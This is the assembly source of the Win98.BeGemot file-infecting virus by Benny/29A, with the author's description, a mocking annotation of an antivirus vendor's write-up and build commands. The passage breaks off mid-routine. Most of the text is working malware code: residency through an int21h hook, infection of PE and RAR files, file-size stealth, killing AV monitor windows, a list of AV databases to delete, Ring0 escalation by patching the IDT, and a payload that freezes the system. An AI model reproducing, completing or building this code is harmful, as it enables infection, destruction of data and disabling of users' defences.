Virus.Win98.BeGemot.8192 - Source Code

1. �������������������������������������������������������������������[bg.asm]���
2. ;                                                     ������� ������� �������
3. ;                                                     ��� ��� ��� ��� ��� ���
4. ;          Win98.BeGemot.8192                         ������  ������� �������
5. ;          by Benny/29A                               ������� ������� ��� ���
6. ;                                                     ������� ������� ��� ���
7. ;                                                    
8. ;
9. ;
10. ;Author's description
11. ;���������������������
12. ;
13. ;I'm very proud to introduce my best virus. I wanted to show ya in this virus,
14. ;what everything I can. There aren't all my favourite techniques (such as
15. ;Memory Mapped Files), nevertheless I think this is a good virus. I tried to
16. ;optimize it as much as I could, but there is still for sure something, that
17. ;could be optimized much more than it is. But that's a life... I call it
18. ;Win98 infector coz I tested it only on my Win98 machine. It should work on
19. ;Win95 also, but devil never sleeps. I'm not sure, so that's why I call it
20. ;Win98. Hmmmm, okay, that was the foreword, and now here is that promised
21. ;description...
22. ;
23. ;This virus is the Win98 resident/semi-stealth/compressed/slow poly/Pentium+/
24. ;multithreaded/Ring3/Ring0/PE/RAR/fast infector. It also deletes some AV
25. ;databases/killin some AV monitors/uses VxDCall0 backdoor to call DOS
26. ;services/usin' undocumented opcode and can infect EXE/SCR/RAR/SFX/CPL/DAT/BAK
27. ;files. It appends to last section in PE files/inserts Win9X dropper into RAR
28. ;files and enlarge files with constant size, that's 8192 bytes. (I decided,
29. ;this is perfect number, noone will mind.) It uses BPE32 (Benny's Polymorphic
30. ;Engine for Win32, published in DDT#1) and BCE32 (published in 29A#4) engines.
31. ;BPE32 has perfect SEH trick (it fools many AVs) and BCE32 saves about 1,9kB
32. ;of virus code (!!!). Combination of these engines is my virus, that is (in
33. ;this time - summer 1999) undetectable by any heuristic methods (only first
34. ;generation of virus is detectable). I tested it with DrWeb (IMO the best AV),
35. ;NODICE32 (IMO the second best), AVP (perfect scanner, but...) and many otherz.
36. ;
37. ;But that's not all. If virus will get resident in memory, virus will jump to
38. ;Ring0, it create VMM thread (system thread) which will patch Ring3 code and so
39. ;allow Ring3 code execution and leave Ring0. Ring3 code will run on, while
40. ;thread will run in memory on the background. Thread will allocate 1kB of
41. ;shared memory (memory accesible to all processes) and slowly check for
42. ;changes in it. If any change will appear, thread will do property action,
43. ;dependin' on change. Why? I coded next to BG communication console, called
44. ;BGVCC (BeGemot Virus Communication Console), so if virus is resident in
45. ;memory, u can easily communicate with virus thread by it. Look at BGVCC
46. ;source and u will see, how can u easily communicate with/control virus.
47. ;This is the first virus with communication interface.
48. ;
49. ;It also uses many trix to fool AVs, e.g. SEH, spec. thread, RETF etc...
50. ;
51. ;
52. ;
53. ;Vocabulary (these words r often used)
54. ;��������������������������������������
55. ;
56. ;       BG        -     Win98.BeGemot, this virus.
57. ;       BGVCC     -     BeGemot Virus Communication Console, utility included
58. ;                       with this virus for controlin' BG and communicatin'
59. ;                       with it.
60. ;       BGCB      -     BeGemot Control Block. If u watch any system manual,
61. ;                       u will see THCB (Thread Control Block), VMCB (Virtual
62. ;                       Machine Control Block), etc. I decided, BGCB is rite
63. ;                       abbreviation for callin' this, really system block.
64. ;                       It holds all items, that r used to communicate with
65. ;                       BG / BG thread.
66. ;       BG thread -     VMM thread, which manages BGCB.
67. ;
68. ;
69. ;
70. ;What will happen on execution ?
71. ;�������������������������������-
72. ;
73. ;Virus will:
74. ;1) Decrypt it's body by polymorphic decryptor
75. ;2)     Decompress virus body
76. ;3)     Check, if it is already resident.
77. ;4)     Try to find VxDCall0 API
78. ;5)     Install virus to memory
79. ;6)     Kill some AV monitors (AVP, NODICE)
80. ;7)     Jump to host
81.  
82. ;Virus in memory will:
83. ;1)     Check requested service
84. ;       -       size stealth stage (stealth and quit)
85. ;       -       infection stage (continue)
86. ;2)     Check filename
87. ;3)     Jump to Ring0 (by modifyin' IDT)
88. ;4)     Create new thread
89. ;5)     Exit from Ring0
90. ;6)     Infect file
91. ;7)     Delete some AV files
92. ;8)     Jump to previous handler
93. ;
94. ;
95. ;
96. ;AVP's description
97. ;������������������
98. ;
99. ;Benny's notes: This is the worst description I have ever seen for so large
100. ;virus as BeGemot is. U can see my notes in [* *]. Well, here is it:
101. ;
102. ;
103. ;Win95.Begemot [* It's not fully compatible with Win95, but with Win98 only *]
104. ;
105. ;This is a dangerous [* why dangerous?! *] memory resident parasitic
106. ;polymorphic Windows virus about 8Kb of length. The virus installs itself into
107. ;the Windows memory [* shared memory! *] and infects PE EXE files [* and RAR
108. ;files *] that are accessed. The virus uses system calls that are valid under
109. ;Win95/98 only [* blah, some calls r valid only in Win98 *] and can't spread
110. ;under NT. The virus also has bugs and often halts the system when run [* which
111. ;one?! *]. The virus uses several unusual routines in its code: keeps its code
112. ;encrypted and compressed in affected files (while installing it decompresses
113. ;it); infects RAR archives (adds infected BEER.EXE file [* dropper! *] to
114. ;archives); runs a thread that can communicate with external module [* u mean
115. ;BGVCC? *] which controls the virus (for example, enables/disables infection
116. ;routine) [* I thought u will talk much more about BGVCC *].
117. ;
118. ;The virus also looks for "AVP Monitor" and "Amon Antivirus Monitor" windows
119. ;and closes them; deletes several anti-virus data files; depending on the
120. ;system timer displays a message [* u forgot it or why u can't write here
121. ;what message it is?! *].
122. ;
123. ;The virus also contains the "copyright" text:
124. ;
125. ; Virus Win98.BeGemot by Benny/29A
126. ;
127. ;[* That's all about my 8kB virus, Kasperpig?! *]
128. ;
129. ;
130. ;
131. ;Payload
132. ;��������
133. ;
134. ;Every execution virus test tick counter for 22h value. If matches, virus will
135. ;display MessageBox.
136. ;
137. ;
138. ;
139. ;Greetz
140. ;�������
141. ;
142. ;       Darkman/29A.... U said Amsterdam? Hmmm, prepare yourself for bath
143. ;                       in the river :-)).
144. ;       Super/29A...... w0rkoholic!
145. ;       GriYo/29A...... So here is it with threads. HPS r0x, kewl tutes...
146. ;                       Thanx for all...
147. ;       Billy_Bel...... DDT#1 r0x0r, no lie! Maybe, ehrm... VX and politix,
148. ;                       that ain't rite combination.
149. ;       mgl............ .CZ/.SK RULEZ !!!
150. ;       IntelServ...... Tell me, how is that feelin', when u know, that
151. ;                       everybody hates u!
152. ;       Kaspersky...... That's all u can?!
153. ;
154. ;
155. ;
156. ;How to build
157. ;�������������
158. ;
159. ;       tasm32 -ml -q -m9 bg.asm
160. ;       tlink32 -Tpe -c -x -aa -r bg.obj,,, import32
161. ;       pewrsec.com bg.exe
162. ;
163. ;
164. ;
165. ;For who is this dedicated?
166. ;���������������������������
167. ;
168. ;I dunno yet. But I can say, for who ain't this virus dedicated. It ain't for
169. ;ppl such as IntelServ, for jerx, for stupid ppl, for intolerate ppl, for
170. ;any fanatic ppl (fascists, capitalistix and communists), for my teachers at
171. ;school, for those, who can't use brain, for braggers. This virus is dedicated
172. ;for SMART ppl, whoever is it, whatever is color of their skin, wherever is
173. ;livin'. Important isn't GRADE, important is what u have in your HEAD!
174. ;
175. ;
176. ;
177. ;(c) 1999 Benny/29A. Enjoy!
178.  
179.  
180.  
181. .586p                                           ;why not ;)
182. .model flat                                     ;FLAT model
183.  
184. include mz.inc                                  ;include some important
185. include pe.inc                                  ;include-filez
186. include win32api.inc
187. include useful.inc
188.  
189.  
190. BG_IDLE         equ     0                       ;some equates
191. BG_INFECTINEXEC equ     1                       ;used
192. BG_INFECTINRAR  equ     2                       ;by communication
193. BG_STEALTHIN    equ     3                       ;thread
194.  
195. PC_WRITEABLE    equ     00020000h               ;equates used
196. PC_USER         equ     00040000h               ;in installation
197. PR_SHARED       equ     80060000h               ;stage
198. PC_PRESENT  equ 80000000h
199. PC_FIXED    equ 00000008h
200. PD_ZEROINIT equ 00000001h
201.  
202. mem_size        equ     (virtual_end-Start+0fffh)/1000h ;size of virus in
203.                                                         ;memory (pages)
204.  
205. extrn ExitProcess:PROC                          ;used in first
206.                                                 ;generation only
207.  
208. .data                                           ;data section
209. Start:                                          ;Start of virus
210.         pushad                                  ;save all regs
211.         call gd                                 ;get delta offset
212. gd:     pop ebp                                 ;...
213.         lea esi, [ebp + _compressed_ - gd]      ;where is compressed virus
214.                                                 ;stored
215.         lea edi, [ebp + decompressed - gd]      ;where will be virus
216.                                                 ;decompressed
217.         mov ecx, 12345678h                      ;size of compressed virus
218. c_size = dword ptr $ - 4                        
219.  
220.  
221. ;Decompression routine from BCE32 starts here.
222.     pushad                  ;save all regs
223.     xor eax, eax                ;EAX = 0
224.     xor ebp, ebp                ;EBP = 0
225.     cdq                 ;EDX = 0
226.     lodsb                   ;load decryption key
227.     push eax                ;store it
228.     lodsb                   ;load first byte
229.     push 8                  ;store 8
230.     push edx                ;store 0
231. d_bits: push ecx                ;store ECX
232.     test al, 80h                ;test for 1
233.     jne db0
234.     test al, 0c0h               ;test for 00
235.     je db1
236.     test al, 0a0h               ;test for 010
237.     je db2
238.     mov cl, 6               ;its 011
239.     jmp tb2
240. testb:  test bl, 1              ;is it 1 ?
241.     jne p1
242.     push 0                  ;no, store 0
243. _tb_:   mov eax, ebp                ;load byte to EAX
244.     or al, [esp]                ;set bit
245.     ror al, 1               ;and make space for next one
246.     call cbit
247.     ret
248. p1: push 1                  ;store 1
249.     jmp _tb_                ;and continue
250. db0:    xor cl, cl              ;CL = 0
251.     mov byte ptr [esp+4], 1         ;store 1
252. testbits:
253.     push eax                ;store it
254.     push ebx                ;...
255.     mov ebx, [esp+20]           ;load parameter
256.     ror bl, cl              ;shift to next bit group
257.     call testb              ;test bit
258.     ror bl, 1               ;next bit
259.     call testb              ;test it
260.     pop ebx                 ;restore regs
261.     pop eax
262.     mov ecx, [esp+4]            ;load parameter
263. bcopy:  cmp byte ptr [esp+8], 8         ;8. bit ?
264.     jne dnlb                ;nope, continue
265.     mov ebx, eax                ;load next byte
266.     lodsb
267.     xchg eax, ebx
268.     mov byte ptr [esp+8], 0         ;and nulify parameter
269.     dec dword ptr [esp]         ;decrement parameter
270. dnlb:   shl al, 1               ;next bit
271.     test bl, 80h                ;is it 1 ?
272.     je nb                   ;no, continue
273.     or al, 1                ;yeah, set bit
274. nb: rol bl, 1               ;next bit
275.     inc byte ptr [esp+8]            ;increment parameter
276.     loop bcopy              ;and align next bits
277.     pop ecx                 ;restore ECX
278.     inc ecx                 ;test flags
279.     dec ecx                 ;...
280.     jns d_bits              ;if not sign, jump
281.     pop eax                 ;delete pushed parameters
282.     pop eax                 ;...
283.     pop eax                 ;...
284.     popad                   ;restore all regs
285.     jmp decompressed
286. cbit:   inc edx                 ;increment counter
287.     cmp dl, 8               ;byte full ?
288.     jne n_byte              ;no, continue
289.     stosb                   ;yeah, store byte
290.     xor eax, eax                ;and prepare next one
291.     cdq                 ;...
292. n_byte: mov ebp, eax                ;save back byte
293.     ret Pshd        ;quit from procedure with one parameter on stack
294. db1:    mov cl, 2               ;2. bit in decryption key
295.         mov [esp+4], cl                         ;2 bit wide
296.     jmp testbits                ;test bits
297. db2:    mov cl, 4               ;4. bit
298. tb2:    mov byte ptr [esp+4], 3         ;3 bit wide
299.     jmp testbits                ;test bits
300.  
301. _compressed_    db      1a00h dup (?)           ;here is stored compressed
302.                                                 ;virus body
303. decompressed:   db      virus_end-compressed dup (?)  ;here decompressed
304.                 db      size_unint dup (?)      ;and here all uninitialized
305.                                                 ;variables
306. virtual_end:                                    ;end of virus in memory
307. ends
308.  
309. .code                                           ;code section
310. first_gen:                                      ;first generation code
311.         mov esi, offset compressed              ;source
312.         mov edi, offset _compressed_            ;destination
313.         mov ecx, virus_end-compressed+2         ;size
314.         mov ebx, offset workspace1              ;workspace1
315.         mov edx, offset workspace2              ;workspace2
316.         call BCE32_Compress                     ;Compress virus body!
317.         dec eax
318.         mov [c_size], eax                       ;save compressed virus size
319.         jmp Start                               ;jmp to virus
320.  
321.  
322. ;Compression routine from BCE32 starts here. This is used only in first gen.
323.  
324. BCE32_Compress  Proc
325.     pushad                  ;save all regs
326. ;stage 1
327.     pushad                  ;and again
328. create_table:
329.     push ecx                ;save for l8r usage
330.     push 4
331.     pop ecx                 ;ECX = 4
332.     lodsb                   ;load byte to AL
333. l_table:push eax                ;save it
334.     xor edx, edx                ;EDX = 0
335.     and al, 3               ;this stuff will separate and test
336.     je st_end               ;bit groups
337.     cmp al, 2
338.     je st2
339.     cmp al, 3
340.     je st3
341. st1:    inc edx                 ;01
342.     jmp st_end
343. st2:    inc edx                 ;10
344.     inc edx
345.     jmp st_end
346. st3:    mov dl, 3               ;11
347. st_end: inc dword ptr [ebx+4*edx]       ;increment count in table
348.     pop eax
349.     ror al, 2               ;next bit group
350.     loop l_table
351.     pop ecx                 ;restore number of bytes
352.     loop create_table           ;next byte
353.  
354.     push 4                  ;this will check for same numbers
355.     pop ecx                 ;ECX = 4
356. re_t:   cdq                 ;EDX = 0
357. t_loop: mov eax, [ebx+4*edx]            ;load DWORD
358.     inc dword ptr [ebx+4*edx]       ;increment it
359.     cmp eax, [ebx]              ;test for same numbers
360.     je _inc_                ;...
361.     cmp eax, [ebx+4]            ;...
362.     je _inc_                ;...
363.     cmp eax, [ebx+8]            ;...
364.     je _inc_                ;...
365.     cmp eax, [ebx+12]           ;...
366.     jne ninc_               ;...
367. _inc_:  inc dword ptr [ebx+4*edx]       ;same, increment it
368.     inc ecx                 ;increment counter (check it in next turn)
369. ninc_:  cmp dl, 3               ;table overflow ?
370.     je re_t                 ;yeah, once again
371.     inc edx                 ;increment offset to table
372.     loop t_loop             ;loop
373.     popad                   ;restore regs
374.  
375. ;stage 2
376.     pushad                  ;save all regs
377.     mov esi, ebx                ;get pointer to table
378.     push 3
379.     pop ebx                 ;EBX = 3
380.     mov ecx, ebx                ;ECX = 3
381. rep_sort:                   ;bubble sort = the biggest value will
382.                         ;always "bubble up", so we know number
383.                         ;steps
384.     push ecx                ;save it
385.     mov ecx, ebx                ;set pointerz
386.     mov edi, edx                ;...
387.     push edx                ;save it
388.     lodsd                   ;load DWORD (count)
389.     mov edx, eax                ;save it
390. sort:   lodsd                   ;load next
391.     cmp eax, edx                ;is it bigger
392.     jb noswap               ;no, store it
393.     xchg eax, edx               ;yeah, swap DWORDs
394. noswap: stosd                   ;store it
395.     loop sort               ;next DWORD
396.     mov eax, edx                ;biggest in EDX, swap it
397.     stosd                   ;and store
398.     lea esi, [edi-16]           ;get back pointer
399.     pop edx                 ;restore regs
400.     pop ecx
401.     loop rep_sort               ;and try next DWORD
402.     popad
403. ;stage 3
404.     pushad                  ;save all regs
405.     xor eax, eax                ;EAX = 0
406.     push eax                ;save it
407.     push 4
408.     pop ecx                 ;ECX = 4
409. n_search:
410.     push edx                ;save regs
411.     push ecx
412.     lea esi, [ebx+4*eax]            ;get pointer to table
413.     push eax                ;store reg
414.     lodsd                   ;load DWORD to EAX
415.     push 3
416.     pop ecx                 ;ECX = 3
417.     mov edi, ecx                ;set pointerz
418. search: mov esi, edx
419.     push eax                ;save it
420.     lodsd                   ;load next
421.     mov ebp, eax
422.     pop eax
423.     cmp eax, ebp                ;end ?
424.     je end_search
425.     dec edi                 ;next search
426.     sub edx, -4
427.     loop search
428. end_search:
429.     pop eax                 ;and next step
430.     inc eax
431.     pop ecx
432.     pop edx
433.     add [esp], edi
434.     rol byte ptr [esp], 2
435.     loop n_search
436.     pop [esp.Pushad_ebx]            ;restore all
437.     popad                   ;...
438. ;stage 4
439.     xor ebp, ebp                ;EBP = 0
440.     xor edx, edx                ;EDX = 0
441.     mov [edi], bl               ;store decryption key
442.     inc edi                 ;increment pointer
443. next_byte:
444.     xor eax, eax                ;EAX = 0
445.     push ecx
446.     lodsb                   ;load next byte
447.     push 4
448.     pop ecx                 ;ECX = 4
449. next_bits:
450.     push ecx                ;store regs
451.     push eax
452.     and al, 3               ;separate bit group
453.     push ebx                ;compare with next group
454.     and bl, 3
455.     cmp al, bl
456.     pop ebx
457.     je cb0
458.     push ebx                ;compare with next group
459.     ror bl, 2
460.     and bl, 3
461.     cmp al, bl
462.     pop ebx
463.     je cb1
464.     push ebx                ;compare with next group
465.     ror bl, 4
466.     and bl, 3
467.     cmp al, bl
468.     pop ebx
469.     je cb2
470.     push 0                  ;store bit 0
471.     call copy_bit
472.     push 1                  ;store bit 1
473.     call copy_bit
474. cb0:    push 1                  ;store bit 1
475. end_cb1:call copy_bit
476.     pop eax
477.     pop ecx
478.     ror al, 2
479.     loop next_bits              ;next bit
480.     pop ecx
481.     loop next_byte              ;next byte
482.     mov eax, edi                ;save new size
483.     sub eax, [esp.Pushad_edi]       ;...
484.     mov [esp.Pushad_eax], eax       ;...
485.     popad                   ;restore all regs
486.     cmp eax, ecx                ;test for negative compression
487.     jb c_ok                 ;positive compression
488.     stc                 ;clear flag
489.     ret                 ;and quit
490. c_ok:   clc                 ;negative compression, set flag
491.     ret                 ;and quit
492. cb1:    push 0                  ;store bit 0
493. end_cb2:call copy_bit
494.     push 0                  ;store bit 0
495.     jmp end_cb1
496. cb2:    push 0                  ;store bit 0
497.     call copy_bit
498.     push 1                  ;store bit 1
499.     jmp end_cb2
500. copy_bit:
501.     mov eax, ebp                ;get byte from EBP
502.     shl al, 1               ;make space for next bit
503.     or al, [esp+4]              ;set bit
504.     jmp cbit
505. BCE32_Compress  EndP                ;end of compression procedure
506.  
507.  
508. compressed:                                     ;compressed body starts here
509.         @SEH_SetupFrame <jmp quit_payload>      ;setup SEH frame
510.         db      0d6h                            ;undoc. opcode SALC
511.                                                 ;used only to fool AVs
512.         call gdelta                             ;calculate delta offset
513. gdelta: pop ebp
514.         mov ebx, 0bff70000h                     ;base address of K32 (95/98)
515.         mov eax, [ebx.MZ_lfanew]                ;get ptr to PE
516.         add eax, ebx                            ;make it raw ptr
517.     mov edi, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
518.         add edi, ebx                            ;get virtual address of ET
519.         mov esi, [edi.ED_AddressOfFunctions]    ;get start address of exported
520.         add esi, ebx                            ;functions
521.  
522.         xor edx, edx                            ;EDX=0
523. l_addr: cmp edx, [edi.ED_NumberOfFunctions]     ;end of functions addresses?
524.         jnb end_host                            ;yeah, jump to host
525.         push 7                                  
526.         pop ecx                                 ;ECX=7
527. l_func: inc edx                                 ;EDX++
528.         lodsd                                   ;load dword
529.         cmp eax, [esi]                          ;addresses equal?
530.         jne l_addr                              ;no, next function
531.         loop l_func                             ;yeah, next check
532.         add eax, ebx                            ;make it raw ptr
533.         mov [ebp + VxDCall0 - gdelta], eax      ;and save address of VxDCall0
534.         xchg eax, esi                           ;EAX <=> ESI
535.  
536.         xor eax, eax                            ;residency check
537.         mov ah, 2ah                             ;get system time
538.         mov edi, '!BG!'                         ;our sign
539.         call int21h                             ;call int21h dispatcher
540.         cmp esi, 1982                           ;already resident?
541.         je end_host                             ;yeah, jump to host
542.  
543.         push PC_WRITEABLE or PC_USER            ;now we will reserve memory
544.         push mem_size                           ;for our virus body in shared
545.         push PR_SHARED                          ;area of virtual memory, so it
546.         push 00010000h                          ;will be visible for all
547.         call [ebp + VxDCall0 - gdelta]          ;processes
548.         inc eax                                 ;error ?
549.         je end_host                             ;yeah, jump to host
550.         dec eax                                 ;no, continue
551.         mov ebx, eax                            ;save address to EBX register
552.         cmp eax, 80000000h                      ;is it in shared area ?
553.         jb pg_free                              ;no, free pages and quit
554.         mov [ebp + mem_addr - gdelta], eax      ;save address
555.  
556.     push PC_WRITEABLE or PC_USER or PC_PRESENT or PC_FIXED
557.         push 0                                  ;now we will commit
558.         push PD_ZEROINIT                        ;physical space for our
559.         push mem_size                           ;reserved pages.
560.     shr eax, 0ch
561.     push eax
562.     push 00010001h
563.     call [ebp + VxDCall0 - gdelta]
564.         xchg eax, ecx                           ;error ?
565.         jecxz pg_free                           ;yeah, free pages and quit
566.  
567.         push ebx                                ;save address
568.         sub ebx, compressed-VxDCall_addr-(decompressed-Start)
569.         mov [ebp + jump_loc - gdelta], ebx      ;store handler location
570.  
571.         mov ecx, 100h                           ;now we will search for
572. vxdloop:lodsb                                   ;call instruction
573.         cmp al, 2eh                             ;is it "CS:" selector override?
574.         jne vxdnext                             ;no, next byte
575.         cmp word ptr [esi], 1dffh               ;and is it our instruction?
576.         je got_ptr                              ;yeah, we got ptr to memory
577. vxdnext:loop vxdloop                            ;no, next try
578.  
579.         pop ebx                                 ;EBX=address our pages
580. pg_free:push 0                                  ;shit, address not found,
581.         push ebx                                ;we have to free pages
582.         push 0001000ah                          ;and jump to host
583.         call [ebp + VxDCall0 - gdelta]          ;free pages call
584.         jmp end_host                            ;(((
585.  
586. got_ptr:mov edi, [esp]                          ;get address of our pages
587.         pushad                                  ;save all registers
588.         lea esi, [ebp + compressed-gdelta-(decompressed-Start)]
589.         mov ecx, (virtual_end-Start+3)/4        ;copy virus to shared memory
590.         rep movsd                               ;...
591.         popad                                   ;restore all registers
592.  
593.         cli                                     ;exclusive execution
594.         inc esi                                 ;skip instruction
595.     inc esi
596.         lodsd                                   ;load address from instruction
597.         push eax                                ;store it
598.         xchg eax, esi                           ;ESI=address
599.         mov edi, ebx                            ;EDI=original address of address
600.     push 6
601.         pop ecx                                 ;ECX=6
602.         rep movsb                               ;save original 48bit address
603.         pop edi                                 ;restore address
604.         pop eax                                 ;get ptr to shared memory
605.         sub eax, compressed-VxDCall_hook-(decompressed-Start)
606.         stosd                                   ;store address of our handler
607.         mov eax, cs                             ;+selector
608.         stosw                                   ;store selector
609.         sti                                     ;nonexclusive execution...
610.  
611. end_host:
612.         in al, 40h                              ;is it rite time to activate
613.         cmp al, 22                              ;our payload?
614.         je do_payload                           ;yeah
615.  
616.         lea esi, [ebp + ShItTyMoNs - gdelta]    ;no, but lets kill some
617.         xor edi, edi                            ;AV monitors
618.     push 2
619.         pop ecx                                 ;2 monitors
620. KiLlMoNs:
621.     push ecx
622.     push esi
623.     push edi
624.         call [ebp + FndWndA - gdelta]           ;find window
625.         test eax, eax                           ;found?
626.         je next_mon                             ;no, try to kill other monitor
627.         push edi                                ;now we will send message
628.         push edi                                ;to AV window to kill itself
629.         push 12h                                ;veeeeeeery stupid X-DD
630.     push eax
631.         call [ebp + PstMsgA - gdelta]           ;bye bye, hahaha
632. next_mon:
633.         add esi, 0ch                            ;next monitor string
634.     pop ecx
635.         loop KiLlMoNs                           ;kill another one
636.  
637. quit_payload:
638.         @SEH_RemoveFrame                        ;remove SEH frame
639.         popad                                   ;restore all regs
640.         push cs                                 ;now we will use FAR return
641.         db      0a1h                            ;trick to fool some stupid
642.         dd 400002h.MZ_res2                      ;heuristic scanners. Heh, who
643.         sub eax, -400000h                       ;could expect someone will
644.         push eax                                ;FAR return in flat model, heh
645.         retf                                    ;jump to host
646.  
647. do_payload:                                     ;time for our payload
648.         push 1000h                              ;system modal window
649.         call szTitle                            ;title of window
650. sztt    db      "Virus Win98.BeGemot by Benny/29A", 0
651.  
652. ShItTyMoNs:
653.     db  'AVP Monitor', 0
654.     db  'Amon Antivirus Monitor', 0
655.  
656. szTitle:call szText                             ;text of window
657. sztx    db      'Wait a minute,',0dh,0dh
658.         db      'Micro$h!t is everywhere u want to be...',0dh
659.         db      'Please call Micro$h!t on-line help, if u have any problems.',0dh
660.         db      'Don''t u have a telephone? So call your system supervisor.',0dh
661.         db      'R u supervisor? So call Micro$h!t on-line help...',0dh
662.     db  'Ehrm, well... where do u want to go y3st3rday?',0dh,0dh
663.         db      'PS: Your problem ain''t virus. Micro$h!t didn''t certified', 0dh
664.     db  'this hardware, buy a new one...',0dh
665.     db  'Press OK button to solve this problem by Micro$h!t...',0
666. MsgBxA  dd      0bff5412eh
667. FndWndA dd  0bff5590ch
668. PstMsgA dd  0bff556fch
669.  
670. szText: push 0                                  ;HWnd=0
671.         call [ebp + MsgBxA - gdelta]            ;display message box
672.         cli                                     ;fuck all preemptives
673. FuckThemAll:
674.         jmp FuckThemAll                         ;infinite loop. System wont
675.                                                 ;switch to another process ;)
676. write_something:                                ;WriteToFile procedure
677.         mov ah, 40h                             ;Write to file service
678.         jmp int21h                              ;call int21h
679.  
680. read_something:                                 ;ReadFromFile procedure
681.         lea edx, [ebp + header - mgdelta]       ;to header variable
682. r_something:                                    ;ReadFromFile procedure2
683.         mov ah, 3fh                             ;service number
684. int21h: push ecx                                ;push parameters
685.     push eax
686.         push 002a0010h                          ;service number to VMM
687. ipatch: jmp int21                               ;call int21h
688.  
689. rint21: call [ebp + VxDCall0 - mgdelta]         ;resident version of int21h
690.     ret
691. int21:  call [ebp + VxDCall0 - gdelta]          ;runtime version of int21h
692.     ret
693.        
694. ;AV filez born to be deleted
695. ShItTyFiLeZ:    db      'DRWEBASE.VDB', 0       ;ByE-kAsPeRsKy
696.                 db      'NOD32.000', 0          ;ByE-tRnKa
697.                 db      'AVG.AVI', 0            ;ByE-oDeHnAl
698.                 db      'ANTI-VIR.DAT', 0       ;ByE-tBaV
699.                 db      'AVP.CRC', 0            ;ByE-aVp
700.  
701. RARHeader:                                      ;No comment ;)
702. RARHeaderCRC    dw  0
703. RARType     db  74h
704. RARFlags    dw  8000h
705. RARHSize        dw      end_RAR-RARHeader
706. RARCompressed   dd  3000h
707. RAROriginal dd  3000h
708. RAROS       db  0
709. RARCRC32    dd  0
710. RARFileDateTime dd      12345678h
711. RARNeedVer  db  14h
712. RARMethod   db  30h
713. RARFNameSize    dw      end_RAR-RARName
714. RARAttrib   dd  0
715. RARName     db  'BEER.EXE'
716. end_RAR:
717.  
718. last_test:
719.         cmp ah, 2ah                             ;Get system time?
720.         jne exit_infection                      ;no, back to original handler
721.         cmp edi, '!BG!'                         ;our sign?
722.         jne exit_infection                      ;no, back to orig. handler
723.         popad                                   ;restore all registers
724.         mov esi, 1982                           ;mark this
725.         jmp farjmp                              ;and quit
726.  
727. VxDCall_hook    proc                ;VXDCall hooker starts here
728.     pushad                  ;save all regs
729.     call mgdelta                ;get delta offset
730. mgdelta:pop ebp
731.     xor ecx, ecx                ;ECX=0
732.         mov cl, 1                               ;CL=semaphore
733. semaphore = byte ptr $ - 1
734.         jecxz quit_hook                         ;we wont trace our calls
735.  
736.         cmp eax, 002a0010h                      ;int21h dispatch service?
737.         jne quit_hook                           ;no, quit
738.  
739.         mov eax, [esp+2ch]                      ;get service number
740.  
741.     cmp ah, 3dh             ;Open file ?
742.     je infect
743.     cmp ah, 43h             ;Get/Set attributes
744.     je infect
745.     cmp ax, 6c00h               ;Extended Create/Open
746.     je infct2
747.     cmp ah, 71h             ;any LFN service ?
748.     jne last_test
749.     cmp al, 43h             ;Extended Get/Set attributes ?
750.     je infect
751.     cmp al, 4eh             ;LFN find first file
752.     je stealth
753.     cmp al, 4fh             ;LFN find next file
754.     je stealth
755.     cmp al, 56h             ;LFN rename file
756.     je infect
757.     cmp al, 6ch             ;LFN extended open
758.     je infct2
759.     cmp al, 0a8h                ;LFN short name
760.     je infct2
761.  
762. exit_infection:
763.         mov byte ptr [ebp + semaphore - mgdelta], 1        ;set semaphore
764.         mov byte ptr [ebp + v_state - mgdelta], BG_IDLE    ;set virus state
765. quit_hook:
766.         popad                                              ;restore all regs
767. farjmp: jmp fword ptr cs:[12345678h]                       ;and jump to
768. jump_loc = dword ptr $ - 4                                 ;previous handler
769.  
770. s_int21h:                                                  ;int21h for stealth
771.         push ecx                                           ;function
772.     push eax
773.     push 002a0010h
774.     call [ebp + VxDCall0 - sgdelta]
775.     ret
776.  
777. stealth:                                       ;stealthin function starts here
778.         mov byte ptr [ebp + v_state - mgdelta], BG_STEALTHIN ;set virus state
779.  
780.         push dword ptr [esp+28h]                ;now we will call property
781.         pop dword ptr [ebp + s_ret - mgdelta]   ;function and get result          
782.     lea eax, [ebp + api_ret - mgdelta]
783.         mov [esp+28h], eax                      ;set return address
784.  
785.         mov [ebp + find_data - mgdelta], edi    ;save ptr to WIN32FINDDATA
786.         jmp quit_hook                           ;and call prev. handler
787.  
788. api_ret:jc b2caller                             ;return and get results
789.         pushad                                  ;get delta offset
790.     call sgdelta
791. sgdelta:pop ebp
792.  
793.         mov edi, 12345678h                      ;get WIN32FINDDATA
794. find_data = dword ptr $ - 4
795.  
796.     lea esi, [edi.WFD_szFileName]
797.     push esi
798.         call c_name                             ;check filename
799.     pop esi
800.         jc quit_stealth                         ;error, quit stealth
801.  
802.         mov byte ptr [ebp + semaphore - sgdelta], 0      ;set semaphore
803.         mov eax, 716ch                          ;Extended Open/Create file
804.         xor ebx, ebx                            ;flags
805.         xor ecx, ecx                            ;attributes
806.         cdq                                     ;action
807.         inc edx                                 ;...
808.         call s_int21h                           ;call it
809.         jc quit_stealth                         ;error?
810.     xchg eax, ebx
811.  
812.         mov ah, 3fh                             ;read DOS MZ header
813.     push IMAGE_SIZEOF_DOS_HEADER
814.     pop ecx
815.     lea edx, [ebp + header - sgdelta]
816.         call s_int21h                           ;...
817.     jc s_close
818.  
819.         cmp word ptr [ebp + header.MZ_res2 - sgdelta], 29ah  ;is it infected
820.         jne s_close                             ;no, quit
821.         add dword ptr [edi.WFD_nFileSizeLow], -2000h   ;yeah, return original
822.                                                        ;size
823.  
824. s_close:mov ah, 3eh                             ;close file
825.     call s_int21h
826. quit_stealth:
827.         mov byte ptr [ebp + semaphore - sgdelta], 1    ;set semaphore
828.         popad                                   ;restore all regs
829.         clc                                     ;clear carry
830. b2caller:
831.         push 12345678h                          ;and jump back
832. s_ret = dword ptr $ - 4                         ;to host program
833.         ret                                     ;...
834.  
835. EnterRing0:                                     ;Ring0 port
836.         pop eax                                 ;get address
837.         pushad                                  ;save all registers
838.         pushad                                  ;and again
839.         sidt fword ptr [esp-2]                  ;load 6byte long IDT address
840.         popad                                   ;restore registers
841.         sub edi, -(8*3)                         ;move to int3
842.         push dword ptr [edi]                    ;save original IDT
843.         stosw                                   ;modify IDT
844.         inc edi                                 ;move by 2
845.         inc edi                                 ;...
846.         push dword ptr [edi]                    ;save original IDT
847.         push edi                                ;save pointer
848.         mov ah, 0eeh                            ;IDT FLAGs
